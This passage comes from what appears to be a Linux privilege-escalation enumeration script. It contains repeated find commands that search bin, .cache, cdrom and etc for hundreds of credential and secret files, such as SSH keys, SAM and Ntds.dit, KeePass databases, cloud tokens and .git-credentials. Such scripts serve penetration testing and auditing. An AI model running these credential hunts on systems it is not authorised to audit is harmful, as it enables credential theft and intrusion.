-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_BIN=`eval_bckgrd
"find ${ROOT_FOLDER}bin -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CACHE=`eval_bckgrd
"find ${ROOT_FOLDER}.cache -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_CDROM=`eval_bckgrd
"find ${ROOT_FOLDER}cdrom -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_ETC=`eval_bckgrd
"find ${ROOT_FOLDER}etc -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*knockd*\" -o -name \"*vnc*.txt\" -o -name
\"psk.txt\" -o -name \"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name
\"*.rdg\" -o -name \"kadm5.acl\" -o -name \"datasources.xml\" -o -name
\"*credential*\" -o -name \"hudson.util.Secret\" -o -name \"*.tf\" -o -name
\"glusterfs.key\" -o -name \"sysprep.xml\" -o -name \"*.psk\" -o -name
\"fastcgi_params\" -o -name \"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name
\"*.socket\" -o -name \"grafana.ini\" -o -name \"authorized_hosts\" -o -name
\"airflow.cfg\" -o -name \"settings.php\" -o -name \"access_tokens.db\" -o -name
\"*_history*\" -o -name \"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\"
-o -name \".Xauthority\" -o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o
-name \"mongod*.conf\" -o -name \"glusterfs.ca\" -o -name \"secrets.yml\" -o
-name \"*.cer\" -o -name \"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\"
-o -name \"docker.sock\" -o -name \"filezilla.xml\" -o -name \"error.log\" -o
-name \"tomcat-users.xml\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"exports\" -o -name \"rocketchat.service\" -o -name
\"*.pem\" -o -name \".git\" -o -name \"autounattend.xml\" -o -name
\".git-credentials\" -o -name \"printers.xml\" -o -name \"webserver_config.py\"
-o -name \".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\"
-o -name \"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\"
-o -name \"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\"
-o -name \"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name
\"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name \".profile\" -o -name
\"credentials.db\" -o -name \"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\"
-o -name \"dockershim.sock\" -o -name \"*.tfstate\" -o -name \".plan\" -o -name
\"FreePBX.conf\" -o -name \"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\"
-o -name \"ntuser.dat\" -o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name
\"storage.php\" -o -name \"config.php\" -o -name \"backups\" -o -name
\".ldaprc\" -o -name \"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o
-name \"ipsec.secrets\" -o -name \"smb.conf\" -o -name \"autologin\" -o -name
\"racoon.conf\" -o -name \"accessTokens.json\" -o -name \"unattend.txt\" -o
-name \"snmpd.conf\" -o -name \"passwd.ibd\" -o -name \"gitlab.rm\" -o -name
\"ffftp.ini\" -o -name \"*.vmdk\" -o -name \"*.gpg\" -o -name
\".google_authenticator\" -o -name \"protecteduserkey.bin\" -o -name
\"wp-config.php\" -o -name \"elasticsearch.y*ml\" -o -name \".k5login\" -o -name
\"access.log\" -o -name \"recentservers.xml\" -o -name \"sites.ini\" -o -name
